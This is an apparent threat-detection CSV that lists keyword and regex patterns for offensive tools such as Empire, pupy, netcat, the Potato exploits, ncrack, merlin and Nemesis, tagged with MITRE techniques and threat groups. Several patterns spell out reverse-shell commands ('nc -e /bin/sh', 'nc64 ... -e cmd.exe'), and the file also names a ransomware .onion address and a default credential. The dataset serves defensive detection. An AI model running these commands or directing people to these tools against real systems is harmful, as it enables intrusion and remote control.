T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","52685" "*NBNSBruteForceTarget*",".{0,1000}NBNSBruteForceTarget.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52686" "*nbnsspoof.py*",".{0,1000}nbnsspoof\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - 
T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","52687" "*NBNSSpoofer*",".{0,1000}NBNSSpoofer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","52688" "*nbzzb6sa6xuura2z.onion*",".{0,1000}nbzzb6sa6xuura2z\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","52694" "*nc 127.0.0.1 4000*",".{0,1000}nc\s127\.0\.0\.1\s4000.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","8","5","456","76","2024-11-27T18:34:33Z","2017-12-19T18:10:35Z","52696" "*nc -c /bin/sh *",".{0,1000}nc\s\-c\s\/bin\/sh\s.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#linux","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","52697" "*nc -e /bin/sh * *",".{0,1000}nc\s\-e\s\/bin\/sh\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","#linux","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","52698" "*nc -nlvp 4444*",".{0,1000}nc\s\-nlvp\s4444.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059.001 - T1021.004 - T1090.002","TA0002 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er/blob/main/Shell3er.ps1","1","0","N/A","N/A","N/A","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","52703" "*nc -vlp 
4444*",".{0,1000}nc\s\-vlp\s4444.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","52706" "*nc -vlp 4445*",".{0,1000}nc\s\-vlp\s4445.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","52707" "*nc.exe 127.0.0.1 4444*",".{0,1000}nc\.exe\s127\.0\.0\.1\s4444.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","52710" "*nc.exe -l -p 1337*",".{0,1000}nc\.exe\s\-l\s\-p\s1337.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","52712" "*nc64 127.0.0.1 9000 -e cmd.exe*",".{0,1000}nc64\s127\.0\.0\.1\s9000\s\-e\scmd\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for 
retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","52713" "*nc64 -L -vv -p 9000*",".{0,1000}nc64\s\-L\s\-vv\s\-p\s9000.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","52714" "*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","0","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","52715" "*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","GodPotato","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation 
tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52716" "*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","GodPotato","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","52717" "*ncacn_ip_tcp:fuck you !*",".{0,1000}ncacn_ip_tcp\:fuck\syou\s!.{0,1000}","offensive_tool_keyword","SigmaPotato","SeImpersonate privilege escalation tool","T1134 - T1055 - T1543","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/tylerdotrar/SigmaPotato","1","0","N/A","N/A","9","4","326","38","2024-05-16T23:46:04Z","2023-09-09T01:35:42Z","52718" "*nccgroup/ABPTTS*",".{0,1000}nccgroup\/ABPTTS.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","52722" "*nccgroup/Accomplice*",".{0,1000}nccgroup\/Accomplice.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","52723" "*nccgroup/demiguise*",".{0,1000}nccgroup\/demiguise.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to 
generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","1","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","52724" "*nccgroup/SCOMDecrypt*",".{0,1000}nccgroup\/SCOMDecrypt.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","1","N/A","N/A","10","2","123","22","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z","52725" "*ncrack-*.dmg*",".{0,1000}ncrack\-.{0,1000}\.dmg.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","#macos","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52726" "*ncrack-*-setup.exe*",".{0,1000}ncrack\-.{0,1000}\-setup\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52727" 
"*ncrack.exe*",".{0,1000}ncrack\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52728" "*NcrackInstaller.exe*",".{0,1000}NcrackInstaller\.exe.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52729" "*ncrack-master.zip*",".{0,1000}ncrack\-master\.zip.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52730" "*ncrack-services*",".{0,1000}ncrack\-services.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","52731" "*ndDelegation.py*",".{0,1000}ndDelegation\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","52732" "*ndp_spoof.*",".{0,1000}ndp_spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","52733" "*Ne0nd0g/merlin*",".{0,1000}Ne0nd0g\/merlin.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","52734" "*Ne0nd0g/merlin-agent*",".{0,1000}Ne0nd0g\/merlin\-agent.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - 
TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","52735" "*Ne0nd0g/merlin-agent-dll*",".{0,1000}Ne0nd0g\/merlin\-agent\-dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","52736" "*NecroStealer.exe*",".{0,1000}NecroStealer\.exe.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","1","N/A","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","52737" "*needle_sift.x64*",".{0,1000}needle_sift\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - 
Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","52738" "*Needles without the Thread.pptx*",".{0,1000}Needles\swithout\sthe\sThread\.pptx.{0,1000}","offensive_tool_keyword","ThreadlessInject","Threadless Process Injection using remote function hooking.","T1055.012 - T1055.003 - T1177","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/ThreadlessInject","1","0","N/A","N/A","10","8","751","88","2024-09-04T17:11:58Z","2023-02-05T13:50:15Z","52739" "*needlesift.cna*",".{0,1000}needlesift\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","1","N/A","N/A","10","10","32","8","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z","52740" "*Nemesis frontend HTTP server endpoint*",".{0,1000}Nemesis\sfrontend\sHTTP\sserver\sendpoint.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52741" "*nemesis:Qwerty12345@*",".{0,1000}nemesis\:Qwerty12345\@.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52742" "*nemesis@nemesis.com*",".{0,1000}nemesis\@nemesis\.com.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource 
Development","https://github.com/SpecterOps/Nemesis","1","0","#email","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52743" "*nemesis@nemesis.local*",".{0,1000}nemesis\@nemesis\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52744" "*NEMESIS_API_URL*",".{0,1000}NEMESIS_API_URL.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52745" "*NEMESIS_HTTP_SERVER *",".{0,1000}NEMESIS_HTTP_SERVER\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52746" "*nemesis_post_file(*",".{0,1000}nemesis_post_file\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52747" "*nemesis-rabbitmq-discovery*",".{0,1000}nemesis\-rabbitmq\-discovery.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52748" 
"*nemesis-rabbitmq-discovery.default.svc.cluster.local*",".{0,1000}nemesis\-rabbitmq\-discovery\.default\.svc\.cluster\.local.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52749" "*NemesisRabbitMQProducer*",".{0,1000}NemesisRabbitMQProducer.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","52750" "*neo2john.py*",".{0,1000}neo2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","52751" "*neo4jconnection.py*",".{0,1000}neo4jconnection\.py.{0,1000}","offensive_tool_keyword","sprayhound","Password spraying tool and Bloodhound integration","T1110.003 - T1210.001 - T1069.002","TA0006 - TA0007 - 